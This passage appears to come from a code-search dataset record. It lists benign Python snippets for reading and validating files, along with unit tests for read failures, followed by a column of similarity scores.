Skipping...\")\n return None\n\n return catalog_reader", "def test_read_fail1(self):\n mod_fn = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_bad_data1.mod')\n with self.assertRaises(ValueError):\n modreader.get_data(mod_fn) # missing 'IMOD' start", "def readFromFile(filename):\n raise NotImplementedError", "def is_file_readable(local_path, reporter=None):\n if not os.path.exists(local_path):\n if reporter is not None:\n reporter.local_access_error(local_path)\n return False\n elif not os.access(local_path, os.R_OK):\n if reporter is not None:\n reporter.local_permission_error(local_path)\n return False\n return True", "def try_read_file():\n try:\n logging.info('open config file %s', config_file_path)\n with open(config_file_path) as f:\n logging.info('begin io %s', config_file_path)\n config_file = json.load(f)\n logging.info('end io %s', config_file_path)\n return config_file\n except (OSError, IOError) as error:\n logging.info('try_read error %s', error)\n return {}", "def test_read_type_error():\n filename = {}\n with pytest.raises(TypeError):\n read_file(filename)", "def dam_snli_reader(resources_or_conf: Union[dict, SharedResources] = None):\n from jack.readers.multiple_choice.shared import MultipleChoiceSingleSupportInputModule\n from jack.readers.natural_language_inference.decomposable_attention import DecomposableAttentionModel\n from jack.readers.multiple_choice.shared import SimpleMCOutputModule\n shared_resources = create_shared_resources(resources_or_conf)\n\n input_module = MultipleChoiceSingleSupportInputModule(shared_resources)\n model_module = DecomposableAttentionModel(shared_resources)\n output_module = SimpleMCOutputModule(shared_resources)\n return TFReader(shared_resources, input_module, model_module, output_module)", "def fit_reader(self, reader):\n return self.fit(line for (_, line) in reader.readsents(silent=False))", "def get_parallel_reader(path):\n return get_by_scheme(path, SCHEMAS_TO_PARALLELREADERS, LocalParallelReader)", "def _get_reader_fn(self, reader, reader_method=None, path=None) -> Callable:\n if reader_method is None and path is None:\n raise ExecutionEngineError(\n \"Unable to determine spark reader function without reader_method or path\"\n )\n\n if reader_method is None:\n reader_method = self.guess_reader_method_from_path(path=path)\n\n reader_method_op: str = reader_method.lower()\n try:\n if reader_method_op == \"delta\":\n return reader.format(reader_method_op).load\n return getattr(reader, reader_method_op)\n except AttributeError:\n raise ExecutionEngineError(\n f\"Unable to find reader_method {reader_method} in spark.\",\n )", "def test_load_measure_definition_missing_file():\n with pytest.raises(IOError):\n code_reader.load_quality_codes(json_path='missing_path')", "def read_file(self):\n try:\n self.json_parsed_file = parse_progress_report(self.in_file)\n self.output_message += 'Student: {}, {}\\n'.format(self.json_parsed_file['id'],\n self.json_parsed_file['name'])\n return True\n\n except IOError:\n self.output_message += \"File does not exist\\n\"\n self.is_parsed_pdf_valid = False\n return False\n\n except TypeError:\n self.output_message += \"There is an issue with the file\\n\"\n self.is_parsed_pdf_valid = False\n return False", "def exists(reader_name: str) -> bool:\n return plugins.exists(package_name=__name__, plugin_name=reader_name)", "def test_failures(self):\n reader = TextReader('jacksheet', subject='R1XXX', localization=0)\n with pytest.raises(FileNotFoundError):\n reader.load()", "def test_reader(self):\n 
default_list_file = GAMEBASE + \"/Lists/char-LIST.tex\"\n output = name_pdfs.read_names_file(default_list_file)\n self.assertIsInstance(output, dict)\n self.assertGreater(len(output), 0)\n # Check that the function returns a dict ✓\n # Of greater than length 0 ✓\n fname = \"\"\n for example in self.bad_filenames:\n with self.subTest(fname=example):\n with self.assertRaises(OSError):\n name_pdfs.read_names_file(fname)", "def identify_file(self, file):", "def recognize(self, filename):\n fileBasename = os.path.basename(filename)\n startsWithDigit = re.search(r'^\\d', fileBasename)\n mat = self.startsWithMatcher.match(fileBasename)\n if not mat and not startsWithDigit:\n return None\n else:\n if mat: startsWith = mat.group(1)\n else: startsWith = ''\n if startsWith == '' and not startsWithDigit: return None\n for matcher, ipath, dataset, ns in self.matchers[startsWith]:\n filePatternMatch = matcher.match(fileBasename)\n if filePatternMatch:\n self._setCurrent(matcher, ipath, dataset, ns,\n filePatternMatch.groupdict())\n return ipath\n return None" ]
[ "0.67069465", "0.6362347", "0.60579586", "0.5630345", "0.54816085", "0.5466467", "0.544671", "0.5360829", "0.53323615", "0.53214943", "0.5317366", "0.5301518", "0.5290404", "0.52551913", "0.52348626", "0.51969", "0.5128019", "0.5122039", "0.5115842", "0.50972366", "0.5093929", "0.50878334", "0.5085175", "0.5078906", "0.5053685", "0.5031911", "0.5017527", "0.5010337", "0.5005273", "0.5002902", "0.49663925", "0.495978", "0.49577793", "0.49346197", "0.49274442", "0.49203342", "0.49051732", "0.48984012", "0.48923394", "0.48488182", "0.48479095", "0.48472872", "0.4841549", "0.48310313", "0.48280957", "0.48280513", "0.4821775", "0.48153555", "0.48128363", "0.48104116", "0.48007655", "0.47935355", "0.4770342", "0.47678497", "0.47576627", "0.47242782", "0.47234905", "0.47229305", "0.47193727", "0.47166115", "0.4708984", "0.46938214", "0.46914837", "0.46742982", "0.46635488", "0.46487266", "0.46357644", "0.46326035", "0.463139", "0.46304053", "0.4628787", "0.46279776", "0.46242893", "0.4620992", "0.46160322", "0.46112922", "0.461063", "0.46100214", "0.4608178", "0.46042487", "0.4595492", "0.45914593", "0.45889625", "0.45875746", "0.45782232", "0.45732665", "0.4572035", "0.4559005", "0.45548242", "0.4553412", "0.45484912", "0.45475024", "0.45440847", "0.45426163", "0.45368478", "0.45307052", "0.45278323", "0.45199007", "0.4510294", "0.4506399" ]
0.48551324
39
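The identify record above pairs a stream-sniffing lookup with a NoReaderFound error raised when no reader matches. The sketch below shows one plausible shape for such a dispatcher, assuming a hypothetical sniffer registry; the registry, its predicates, and the 1 KiB probe size are all assumptions made for illustration, and only the raise-when-nothing-matches behaviour comes from the record.

```python
import io
from typing import IO, Callable, Dict


class NoReaderFound(Exception):
    """Raised when no registered reader understands the stream."""


# Hypothetical registry: reader name -> predicate that sniffs the first bytes.
_SNIFFERS: Dict[str, Callable[[bytes], bool]] = {
    "json": lambda head: head.lstrip().startswith(b"{"),
    "csv": lambda head: b"," in head.splitlines()[0] if head.strip() else False,
}


def identify(input_stream: IO[bytes]) -> str:
    """Return the name of the first reader whose sniffer accepts the stream."""
    head = input_stream.read(1024)
    input_stream.seek(0)
    for name, sniffs in _SNIFFERS.items():
        if sniffs(head):
            return name
    raise NoReaderFound(
        f"Found no reader that can read {getattr(input_stream, 'name', '<stream>')}"
    )


if __name__ == "__main__":
    print(identify(io.BytesIO(b'{"a": 1}')))  # -> "json"
```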
Shortcut for symbol creation to test "function" and "indexed" API.
def symbol(name, dimensions, value=0., mode='function'): assert(mode in ['function', 'indexed']) s = DenseData(name=name, dimensions=dimensions) s.data[:] = value return s.indexify() if mode == 'indexed' else s
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def FakeSymbol(*args, _op, **kwargs):\n return symbol.Custom(*args, _op=_op, op_type=\"_fake\", **kwargs)", "def __call__(fun_name):", "def input_shortcut(symbol, name=None):\n def input_method(self, *args, **kwargs):\n return self.input(symbol, *args, **kwargs)\n input_method.__name__ = str(name) if name is not None else (\"input_\" + str(symbol))\n input_method.__doc__ = \"Shortcut method to feed symbol '%s' into the FSM.\" % str(symbol)\n return input_method", "def node(func, name=None):\n return NamedFunc(func, name)", "def signature(function):\n pass", "def get_func_lookup():\n return {\n \"randomstr\": randomstr,\n \"random\": random,\n \"sha256\": sha256,\n \"ed25519\": ed25519_private_key,\n \"rsa\": rsa_private_key,\n \"rsapublic\": rsa_public_key,\n \"publickey\": public_key,\n \"reveal\": reveal,\n \"loweralphanum\": loweralphanum,\n \"basicauth\": basicauth,\n }", "def _index_symbols(predicates, functions):\n symbols, symbol_types = OrderedDict(), {}\n\n for s in predicates:\n argtypes = [t.type for t in s.arguments]\n symbols[s.name] = base.Predicate(s.name, argtypes)\n symbol_types[s.name] = 'bool'\n\n for s in functions:\n if s.name != 'total-cost': # Ignore the \"fake\" total-cost function\n argtypes = [t.type for t in s.arguments]\n symbols[s.name] = base.Function(s.name, argtypes, s.type)\n symbol_types[s.name] = s.type\n\n return symbols, symbol_types", "def Method_Access(function):\n \n pass", "def test(func):\n register_tests(func, [func.__name__])", "def __init__(self, func):\r\n self.getter = func\r\n self.name = func.__name__", "def action(func):\n ACTIONS[func.__name__.rstrip('_')] = func\n return func", "def test_symbol_lookup(self):\r\n\r\n def check_lookup(symbol, expected):\r\n op = BaseWhereOperator.get_operator(symbol)\r\n self.assertEqual(op, expected)\r\n\r\n check_lookup('EQ', EqualsOperator)\r\n check_lookup('IN', InOperator)\r\n check_lookup('GT', GreaterThanOperator)\r\n check_lookup('GTE', GreaterThanOrEqualOperator)\r\n check_lookup('LT', LessThanOperator)\r\n check_lookup('LTE', LessThanOrEqualOperator)", "def test_symbol_lookup(self):\n\n def check_lookup(symbol, expected):\n op = BaseWhereOperator.get_operator(symbol)\n self.assertEqual(op, expected)\n\n check_lookup('EQ', EqualsOperator)\n check_lookup('IN', InOperator)\n check_lookup('GT', GreaterThanOperator)\n check_lookup('GTE', GreaterThanOrEqualOperator)\n check_lookup('LT', LessThanOperator)\n check_lookup('LTE', LessThanOrEqualOperator)", "def _make_asserter(member):\n name, fun = member\n new_fun = assert_if_truthy(fun)\n if new_fun.__doc__:\n new_fun.__doc__ = new_fun.__doc__.replace(\"Check\", \"Assert\")\n new_fun.__module__ = __name__\n return (name, new_fun)", "def function(name: str, expr: vecpy.base.Expr, *args) -> vecpy.base.Function:\n return vecpy.base.Function(name, expr, *args)", "def createFunction(self, entryPoint: ghidra.program.model.address.Address, name: unicode) -> ghidra.program.model.listing.Function:\n ...", "def test_node_bracketless(self):\n\n @node\n def a(x):\n return x + \"a\"\n\n @node()\n def b(x):\n return x + \"b\"\n\n self.assertIsInstance(a, SimpleFunction)\n self.assertIsInstance(b, SimpleFunction)\n self.assertEqual((b | a)(\"_\"), \"_ba\")", "def key(func):\n return func.__func__ if hasattr(func, \"__func__\") else func", "def testCreateFunctionCallAction(self):\n\t\tfca = GeneratorAction(('key',), 'c', 'd')\n\t\tself.failUnless(fca.key == ('key',))\n\t\tself.failUnless(fca.pargs == 'c')\n\t\tself.failUnless(fca.vargs == 'd')", "def 
testinternfunc(self):\n\t\treturn describeInterface(self)", "def key(func):\n return func.__func__ if hasattr(func, \"__func__\") else func", "def __init__(self, func, dfunc, name=\"\"):\n self.name = name\n self.func = func\n self.dfunc = dfunc", "def __def_function__():\n pass", "def function(self, name):\n return function_documentor(name)", "def buildPythonDeclaration(self):\n raise Exception(\"Unimplemented function in symbol: \"+self.name)", "def __init__(self, total, function_name, param_sorts, return_sort):\r\n super(FunctionDecl, self).__init__()\r\n global functions\r\n self.total = total\r\n self.function_name = function_name\r\n self.param_sorts = param_sorts\r\n self.return_sort = return_sort\r\n self.basic = basic\r\n self.static = static\r\n\r\n function_info = []\r\n function_info.append(static)\r\n function_info.append(param_sorts)\r\n function_info.append(return_sort)\r\n functions[function_name] = function_info", "def getFunction(self, name: unicode) -> ghidra.program.model.listing.Function:\n ...", "def test_function_statement_at_operator():\n r = convert_code(\"{@foo arg1=bar arg2=3}\")\n assert r == \"{{ {'arg1': bar, 'arg2': 3}|foo }}\"", "def testCreateFunctionCallAction(self):\n\t\tfca = FunctionCallAction(('key',), 'c', 'd', 'ret')\n\t\tself.failUnless(fca.key == ('key',))\n\t\tself.failUnless(fca.pargs == 'c')\n\t\tself.failUnless(fca.vargs == 'd')\n\t\tself.failUnless(fca.value == 'ret')", "def test_func(self):\n def func():\n return 0\n self.assertEqual(type(decorators.timeit(func)), types.FunctionType)", "def my_fuction():\n pass", "async def api(self, symbol: str):\n await self._get_symbols()\n if symbol in self.symbols:\n symbol = self.symbols[symbol]\n if symbol['kind'] == 'fn':\n signature = '{} {}({});'.format(symbol['returns'], symbol['name'],\n 'void' if len(symbol['params']) == 0 else ', '.join(\n '{} {}'.format(x['type'], x['name']) for x in symbol['params']))\n description = self._clean_html(symbol['description'])\n if len(symbol['params']) > 0:\n params = \"\\n\\n**Parameters**\\n\" + '\\n'.join('`{}`: {}'.format(\n x['name'], self._code(x['description'])) for x in symbol['params'])\n else:\n params = ''\n if symbol['return_desc']:\n ret_desc = \"\\n\\n**Returns:** \" + self._code(symbol['return_desc'])\n else:\n ret_desc = ''\n await self.bot.say(\"```c\\n{}\\n```{}{}{}\".format(signature, description, params, ret_desc))\n else:\n await self.bot.say(\"`{}`: {}\".format(symbol['name'], self._clean_html(symbol['description'])))\n else:\n await self.bot.say(\"No such symbol.\")", "def __init__(self, function=None, name=None, description=None):\n self.name = name\n self.function = function\n self.description = description", "def __call__(self, func: Callable) -> Callable:\n NAME_TO_SYMBOL[self._exported_name] = Symbol.from_callable(\n self._exported_name, func)\n return func", "def __init__(self, total, function_name, param_sorts, return_sort):\n super(FunctionDecl, self).__init__()\n global functions\n self.total = total\n self.function_name = function_name\n self.param_sorts = param_sorts\n self.return_sort = return_sort\n self.basic = basic\n self.static = static\n\n function_info = []\n function_info.append(static)\n function_info.append(param_sorts)\n function_info.append(return_sort)\n functions[function_name] = function_info", "def existing_method_from_name(fun_name):\n global STensor\n assert hasattr(torch.Tensor, fun_name)\n if getattr(torch, fun_name) in STABLE_FUNCTIONS:\n stable_fun = STABLE_FUNCTIONS[getattr(torch, fun_name)]\n 
STABLE_FUNCTIONS[getattr(torch.Tensor, fun_name)] = stable_fun\n setattr(STensor, fun_name, stable_fun)\n else:\n print(f\"STILL NEED TO IMPLEMENT {fun_name}\")", "def auto_symbol(tokens: List[TOKEN], local_dict: DICT, global_dict: DICT):\n result: List[TOKEN] = []\n prevTok = (-1, '')\n\n tokens.append((-1, '')) # so zip traverses all tokens\n for tok, nextTok in zip(tokens, tokens[1:]):\n tokNum, tokVal = tok\n nextTokNum, nextTokVal = nextTok\n if tokNum == NAME:\n name = tokVal\n\n if (name in ['True', 'False', 'None']\n or iskeyword(name)\n # Don't convert attribute access\n or (prevTok[0] == OP and prevTok[1] == '.')\n # Don't convert keyword arguments\n or (prevTok[0] == OP and prevTok[1] in ('(', ',')\n and nextTokNum == OP and nextTokVal == '=')\n # the name has already been defined\n or name in local_dict and local_dict[name] is not null):\n result.append((NAME, name))\n continue\n elif name in local_dict:\n local_dict.setdefault(null, set()).add(name)\n if nextTokVal == '(':\n local_dict[name] = Function(name)\n else:\n local_dict[name] = Symbol(name)\n result.append((NAME, name))\n continue\n elif name in global_dict:\n obj = global_dict[name]\n if isinstance(obj, (AssumptionKeys, Basic, type)) or callable(obj):\n result.append((NAME, name))\n continue\n\n result.extend([\n (NAME, 'Symbol' if nextTokVal != '(' else 'Function'),\n (OP, '('),\n (NAME, repr(str(name))),\n (OP, ')'),\n ])\n else:\n result.append((tokNum, tokVal))\n\n prevTok = (tokNum, tokVal)\n\n return result", "def special_def(self, form):\n if not len(form) >= 3:\n raise SyntaxError(\"Not enough forms in %s\" % form)\n if not isinstance(form[1], Form):\n raise SyntaxError(\"Expected a list of [funname args...]\")\n\n doc, code = self._getDocAndCode(form[2:])\n #print \"GOT\", code\n #code.nodes[-1] = ast.Return(code.nodes[-1])\n args = [x.name for x in form[1][1:]]\n \n magicode = self._getMagicCodeForArgs(args)\n \n return ast.Function(None, form[1][0].name, args, [], magicode, doc, code)", "def test_simple_funcs(self):\r\n variables = {'x': 4.712}\r\n functions = {'id': lambda x: x}\r\n self.assertEqual(calc.evaluator({}, functions, 'id(2.81)'), 2.81)\r\n self.assertEqual(calc.evaluator({}, functions, 'id(2.81)'), 2.81)\r\n self.assertEqual(calc.evaluator(variables, functions, 'id(x)'), 4.712)\r\n\r\n functions.update({'f': numpy.sin})\r\n self.assertAlmostEqual(\r\n calc.evaluator(variables, functions, 'f(x)'),\r\n -1, delta=1e-3\r\n )", "def test_method_creation():\n my_method = SGMethod(\"Test\")\n \n assert my_method.name == \"Test\"\n assert len(my_method.params) == 0\n assert my_method.return_type == None", "def virtual(func: \"callable\"):\n return func", "def function_name(parameters):", "def op():\n\n def _register(func):\n\n def _func_wrapper(*args, **kwargs):\n if len(args) > 0:\n raise Exception(\"You may only invoke an @hml.op with named arguments\")\n\n hml_op = HmlContainerOp(func, kwargs)\n\n return hml_op.op\n\n return _func_wrapper\n\n return _register", "def builtin_utility(func):\n func.is_utility = True\n return func", "def istest(func):\n func.__test__ = True\n return func", "def node(_func=None, *, name=None):\n\n def decorator(function):\n newfunc = SimpleFunction(function, name=name)\n return newfunc\n\n if not _func:\n return decorator\n return decorator(_func)", "def define_vmethod(self, type, name, func):\n try:\n self.OPS[type.lower()][name] = func\n except KeyError:\n raise Error(\"invalid vmethod type: %s\\n\" % type)", "def test_function_definition_with_args(self):\n 
self.script(\"# script.py\\n\"\n \"def f(x, y=False):\\n\"\n \" 'fdoc'\\n\"\n \" pass\\n\")\n self.compile()\n\n script = self.find_code_component(name=\"script.py\")\n function_def = self.find_code_component(name=\"f\")\n var_x = self.find_code_component(name=\"x\")\n var_y = self.find_code_component(name=\"y\")\n false = self.find_code_component(name=\"False\")\n\n self.assertEqual(function_def.type, \"function_def\")\n self.assertEqual(function_def.mode, \"w\")\n self.assertEqual(function_def.first_char_line, 2)\n self.assertEqual(function_def.first_char_column, 0)\n self.assertEqual(function_def.last_char_line, 4)\n self.assertEqual(function_def.last_char_column, 8)\n self.assertEqual(function_def.container_id, script.id)\n\n self.assertEqual(var_x.type, \"param\")\n self.assertEqual(var_x.mode, \"w\")\n self.assertEqual(var_x.first_char_line, 2)\n self.assertEqual(var_x.first_char_column, 6)\n self.assertEqual(var_x.last_char_line, 2)\n self.assertEqual(var_x.last_char_column, 7)\n self.assertEqual(var_x.container_id, function_def.id)\n\n self.assertEqual(var_y.type, \"param\")\n self.assertEqual(var_y.mode, \"w\")\n self.assertEqual(var_y.first_char_line, 2)\n self.assertEqual(var_y.first_char_column, 9)\n self.assertEqual(var_y.last_char_line, 2)\n self.assertEqual(var_y.last_char_column, 10)\n self.assertEqual(var_y.container_id, function_def.id)\n\n #self.assertEqual(false.type, \"literal\")\n self.assertEqual(false.mode, \"r\")\n self.assertEqual(false.first_char_line, 2)\n self.assertEqual(false.first_char_column, 11)\n self.assertEqual(false.last_char_line, 2)\n self.assertEqual(false.last_char_column, 16)\n self.assertEqual(false.container_id, function_def.id)\n\n function_def_block = self.metascript.code_blocks_store[function_def.id]\n self.assertEqual(function_def_block.code,\n \"def f(x, y=False):\\n\"\n \" 'fdoc'\\n\"\n \" pass\")\n self.assertEqual(function_def_block.docstring, \"fdoc\")\n self.assertTrue(bool(function_def_block.code_hash))", "def test_func_2(self):\n def func():\n return 0\n self.assertEqual(type(decorators.timeit_2(func)), types.FunctionType)", "def __getattr__(self, exported_function_name: str) -> ExportedFunction:\n pass", "def test_11_funcdecl(self):\n\t\tinput = \"\"\"var x,y:integer;\n\t\tprocedure main(); var x:real; begin x:=y(1,false); {error} end\"\"\"\n\t\texpect = \"Undeclared Function: y\"\n\t\tself.assertTrue(TestChecker.test(input,expect,411))", "def __init__(self, function):\n self.function = function", "def __init__(self, func):\n self.doc = func.__doc__", "def __init__(self, func, type):\n self.func = func\n self.type = type", "def for_function(self, func):\n return self.for_pysig(utils.pysignature(func))", "def testCtor(self):\n try: pykd.DiaSymbol()\n except RuntimeError: pass", "def createSymbol(self, address: ghidra.program.model.address.Address, name: unicode, makePrimary: bool) -> ghidra.program.model.symbol.Symbol:\n ...", "def symbolic(inputs):\n def decorator(method):\n name = \"__\" + method.__name__\n \n def wrapper(self, *args):\n if isinstance(args[0], T.Variable):\n return method(self, *args)\n elif hasattr(self, name):\n return getattr(self, name)(*args)\n else:\n res = method(self, *inputs)\n \n if type(res) is tuple:\n output, updates = res\n else:\n output, updates = res, None\n \n setattr(self, name, theano.function(inputs, output,\n updates=updates))\n \n return getattr(self, name)(*args)\n \n return wrapper\n \n return decorator", "def identify_method(self, func):", "def example_function():", "def 
_register_command(self, function, command_name):\r\n if command_name in self._commands:\r\n raise self.Error('Found two definitions for command %s' % command_name)\r\n self._commands[command_name] = function\r\n return function", "def test_function_doc_string():\n functions = inspect.getmembers(session10, inspect.isfunction)\n for function in functions:\n assert function[1].__doc__", "def split_symbols_custom(predicate: Callable[[str], bool]):\n def _split_symbols(tokens: List[TOKEN], local_dict: DICT, global_dict: DICT):\n result: List[TOKEN] = []\n split = False\n split_previous=False\n\n for tok in tokens:\n if split_previous:\n # throw out closing parenthesis of Symbol that was split\n split_previous=False\n continue\n split_previous=False\n\n if tok[0] == NAME and tok[1] in ['Symbol', 'Function']:\n split = True\n\n elif split and tok[0] == NAME:\n symbol = tok[1][1:-1]\n\n if predicate(symbol):\n tok_type = result[-2][1] # Symbol or Function\n del result[-2:] # Get rid of the call to Symbol\n\n i = 0\n while i < len(symbol):\n char = symbol[i]\n if char in local_dict or char in global_dict:\n result.append((NAME, \"%s\" % char))\n elif char.isdigit():\n chars = [char]\n for i in range(i + 1, len(symbol)):\n if not symbol[i].isdigit():\n i -= 1\n break\n chars.append(symbol[i])\n char = ''.join(chars)\n result.extend([(NAME, 'Number'), (OP, '('),\n (NAME, \"'%s'\" % char), (OP, ')')])\n else:\n use = tok_type if i == len(symbol) else 'Symbol'\n result.extend([(NAME, use), (OP, '('),\n (NAME, \"'%s'\" % char), (OP, ')')])\n i += 1\n\n # Set split_previous=True so will skip\n # the closing parenthesis of the original Symbol\n split = False\n split_previous = True\n continue\n\n else:\n split = False\n\n result.append(tok)\n\n return result\n\n return _split_symbols", "def test_name_properties_on_function():\n assert not Function(name=\"b\", path=\"a.b\", file_path=\"a.py\").name_properties\n assert \"private\" in Function(name=\"_b\", path=\"a._b\", file_path=\"a.py\").name_properties\n assert not Function(name=\"__b\", path=\"a.__b\", file_path=\"a.py\").name_properties\n assert not Function(name=\"__b__\", path=\"a.__b__\", file_path=\"a.py\").name_properties", "def wrapper(func):\n docstring = func.__doc__\n helpdict = parse_docstring(\n docstring, key_symbol=key_symbol,\n description_symbol=description_symbol)\n func.helpdict = helpdict\n # remove markers\n docstring = docstring.replace(key_symbol, '')\n func.__doc__ = docstring.replace(description_symbol, '')\n return func", "def register_command(func):\n supported_commands.append(func.__name__)\n return func", "def getFunctionSymbol(self, symbol):\n if ( symbol in list(self.dict.keys()) and self.dict[symbol][\"type\"] == \"func\"):\n return self.dict[symbol]\n return None", "def add_symbol(self, symbol_name: str, attrs: dict):\n attrs[SymbolAttrs.IS_FUNC] = attrs.get(SymbolAttrs.IS_FUNC, False)\n\n if not attrs[SymbolAttrs.IS_FUNC]:\n if SymbolAttrs.TYPE not in attrs:\n raise SymbolWithoutType(symbol_name)\n\n attrs[SymbolAttrs.SIZE] = get_type_size(attrs)\n attrs[SymbolAttrs.OFFSET] = self.next_offset\n\n self.next_offset += attrs[SymbolAttrs.SIZE]\n self.symbols[symbol_name] = attrs", "def __init__(self, func):\n self.dictionary = {}\n self.func = func", "def createSymbol(self, address: ghidra.program.model.address.Address, name: unicode, makePrimary: bool, makeUnique: bool, sourceType: ghidra.program.model.symbol.SourceType) -> ghidra.program.model.symbol.Symbol:\n ...", "def test__repr__(self):\n def func():\n pass\n assert 
repr(Factory(func)) == '<Factory {}>'.format(func.__qualname__)", "def process_fn(fn_string, symbols):\n fn_string = fn_string.replace('^', '**')\n fn = lambdify([sympy.symbols(symbols)], fn_string, 'numpy')\n return fn", "def test_override_symbol(self):\n i, j, k, l = dimify('i j k l')\n a = symbol(name='a', dimensions=(i, j, k, l), value=2.)\n a1 = symbol(name='a1', dimensions=(i, j, k, l), value=3.)\n a2 = symbol(name='a2', dimensions=(i, j, k, l), value=4.)\n op = Operator(Eq(a, a + 3))\n op()\n op(a=a1)\n op(a=a2)\n shape = [d.size for d in [i, j, k, l]]\n\n assert(np.allclose(a.data, np.zeros(shape) + 5))\n assert(np.allclose(a1.data, np.zeros(shape) + 6))\n assert(np.allclose(a2.data, np.zeros(shape) + 7))", "def create_test_function(description, purl, canonical_purl, is_invalid,\n type, name, namespace, version, qualifiers, subpath, # NOQA\n test_func_prefix='test_purl_pkg_', **kwargs):\n if is_invalid:\n\n def test_purl(self):\n try:\n PackageURL.from_string(purl)\n self.fail('Should raise a ValueError')\n except ValueError:\n pass\n\n try:\n PackageURL.from_string(canonical_purl)\n self.fail('Should raise a ValueError')\n except ValueError:\n pass\n\n try:\n PackageURL(type, namespace, name, version, qualifiers, subpath)\n except ValueError:\n pass\n\n else:\n\n def test_purl(self):\n # parsing the test canonical `purl` then re-building a `purl` from these\n # parsed components should return the test canonical `purl`\n cano = PackageURL.from_string(purl)\n assert canonical_purl == cano.to_string()\n\n # parsing the test `purl` should return the components parsed from the\n # test canonical `purl`\n parsed = PackageURL.from_string(canonical_purl)\n assert cano.to_dict() == parsed.to_dict()\n\n # parsing the test `purl` then re-building a `purl` from these parsed\n # components should return the test canonical `purl`\n assert canonical_purl == parsed.to_string()\n\n # building a `purl` from the test components should return the test\n # canonical `purl`\n built = PackageURL(type, namespace, name, version, qualifiers, subpath)\n assert canonical_purl == built.to_string()\n\n # create a good function name for use in test discovery\n if not description:\n description = purl\n if is_invalid:\n test_func_prefix += 'is_invalid_'\n test_name = python_safe_name(test_func_prefix + description)\n test_purl.__name__ = test_name\n test_purl.funcname = test_name\n return test_purl, test_name", "def __init__(self, var_name, function, description):\n \n self.var_name = var_name\n self.function = function\n self.description = description", "def test_from_callable(self):\n def func(a: int = 0):\n return a\n fsig = FSignature.from_callable(func)\n assert len(fsig.parameters) == 1\n assert fsig.parameters['a'] == FParameter(\n kind=inspect.Parameter.POSITIONAL_OR_KEYWORD,\n name='a',\n interface_name='a',\n default=0,\n type=int,\n )", "def test_function_definition(self):\n func = get_function_definition(PACKAGE_NAME, FUNCTION_NAME)\n assert func", "def test_function_definition(self):\n func = get_function_definition(PACKAGE_NAME, FUNCTION_NAME)\n assert func", "def register_function(self, function, name=None):\n if name:\n self[name] = function\n else:\n self[function.__name__] = function", "def func():", "def test_keyword(self):\n varargs = ()\n kwargs = {'default' : 12}\n method = getattr(self.foo,'f_default')\n var_dict = reassign_function_arguments(method, varargs, kwargs)\n self.assert_(var_dict['default'] == 12)\n self.assert_(len(var_dict) == 1)", "def test_function_name_had_cap_letter():\n 
functions = inspect.getmembers(s7, inspect.isfunction)\n for function in functions:\n assert len(re.findall('([A-Z])', function[0])) == 0, \"You have used Capital letter(s) in your function names\"", "def __init__(self, function, function_representation):\n self.function = function\n self.function_representation = function_representation", "def get_symbols(**kwargs):\n return Symbols(**kwargs).fetch()", "def __init__(self, name=None, description=None):\n super().__init__()\n self.name = name or getattr(self, \"name\", type(self).__name__.lower())\n self.description = description or getattr(self, \"description\", None) or self.__doc__ or self.__class__.__name__\n self.operations = {}\n for function in (attr for attr in (getattr(self, nom) for nom in dir(self)) if callable(attr)):\n try:\n operation = function._roax_operation_\n except:\n continue # ignore undecorated functions\n self._register_operation(**operation)", "def getFunction(self, key: long) -> ghidra.program.model.listing.Function:\n ...", "def true(symbol):\n return True", "def command(fxn):\n\tCMDTABLE[fxn.__name__] = (fxn, fxn.__doc__)\n\treturn fxn", "def test_13_funcdecl(self):\n\t\tinput = \"\"\"var x:integer;\n\t\tprocedure main(); var x:real; begin x:=y(1,2); end\n\t\tfunction y(x:integer;y:boolean):integer; {OK} begin return 1; end\"\"\"\n\t\texpect = \"Type Mismatch In Expression: CallExpr(Id(y),[IntLiteral(1),IntLiteral(2)])\"\n\t\tself.assertTrue(TestChecker.test(input,expect,413))", "def getFunction(self) -> ghidra.program.model.listing.Function:\n ...", "def make_func_code(params):\n class FuncCode(object):\n __slots__ = ('co_varnames', 'co_argcount')\n fc = FuncCode()\n fc.co_varnames = params\n fc.co_argcount = len(params)\n return fc", "def __init__ ( self , func , deriv = None , name = '' ) :\n self.__func = func\n if deriv and callable ( deriv ) : self.__derivative = deriv\n else : self.__derivative = Derivative(func)\n \n if name : self.__name__ = name \n elif hasattr ( func , '__name__' ) and '<lambda>' != func.__name__ :\n self.__name__ = func.__name__\n else : self.__name__ = 'Eval2VE'", "def test_visit_Call__private_function():\n result = compile_restricted_exec('__init__(1)')\n assert result.errors == (\n 'Line 1: \"__init__\" is an invalid variable name because it starts with \"_\"', # NOQA: E501\n )", "def get_func(name, argtypes=None, restype=c_int, lib=libDE):\n logger.debug(\"Getting NewWordFinder API function: 'name': '{}', 'argtypes': '{}',\"\n \" 'restype': '{}'.\".format(name, argtypes, restype))\n func = getattr(lib, name)\n if argtypes is not None:\n func.argtypes = argtypes\n if restype is not c_int:\n func.restype = restype\n logger.debug(\"NewWordFinder API function '{}' retrieved.\".format(name))\n return func", "def GetScriptableInterface(f):\n\n\tconstants = [] # returned as a sorted list\n\tfunctions = {} # returned as a sorted list of items\n\tproperties = {} # returned as a sorted list of items\n\n\tfor name in f.order:\n\t\tfeatures = f.features[name]\n\t\tif features[\"Category\"] != \"Deprecated\":\n\t\t\tif features[\"FeatureType\"] == \"val\":\n\t\t\t\tconstants.append( (name, features) )\n\t\t\telif features[\"FeatureType\"] in [\"fun\",\"get\",\"set\"]:\n\t\t\t\tif features[\"FeatureType\"] == \"get\":\n\t\t\t\t\tpropname = name.replace(\"Get\", \"\", 1)\n\t\t\t\t\tproperties[propname] = (name, properties.get(propname,(None,None))[1])\n\n\t\t\t\telif features[\"FeatureType\"] == \"set\":\n\t\t\t\t\tpropname = name.replace(\"Set\", \"\", 1)\n\t\t\t\t\tproperties[propname] = 
